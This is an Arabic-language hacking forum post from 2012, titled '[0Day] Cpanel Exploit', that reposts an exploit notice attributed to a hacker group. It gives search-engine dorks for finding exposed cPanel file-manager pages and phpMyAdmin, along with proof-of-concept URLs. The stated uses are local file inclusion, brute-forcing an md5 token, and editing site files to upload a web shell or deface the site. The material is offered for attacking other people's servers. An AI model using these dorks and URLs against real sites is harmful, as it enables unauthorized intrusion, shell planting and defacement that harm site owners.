السلام عليكم ورحمة الله وبركاتة
كيف حال اعضاء العناكب
اتركم مع الثغرة
موفقين خير #
كود PHP:
-------------------------------------------------------------------
Author : CyberCode Khorasan [0xCCBF]
Thanks to : All Khorasan CyberArmy Member (Special to: Cep Engking, JinCorn, An0nym0uZ-17, cliZAceh, Hitcher, CFR, XTreMist, PKShadow, DR. Ninja, DB Bust3r, Bagus Hacks)
LFI
---------------------------------
DORK => inurl:/frontend/x3/filemanager/dir.html?dir=
Brute-Force Attack (md5-hash)
---------------------------------
DORK => inurl:/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]
POC => http://[sites]/3rdparty/phpMyAdmin/index.php#PMAURL:server=1&target=main.php&token=[md5_hash]
Edit Files (upload shell / deface)
------------------------------------
DORK => inurl:/frontend/x3/filemanager/editit.html?file=
POC => http://[sites]/frontend/x3/filemanager/editit.html?file=[file_name]&fileop=&dir=[path]&dirop=&charset=&file_charset=utf-8&baseurl=&basedir=
[file_name] = index.php, index.html, etc
[path] = /home/[user]/
10-29-2012, 09:09 AM
[0Day] Cpanel Exploit
العرض الشجري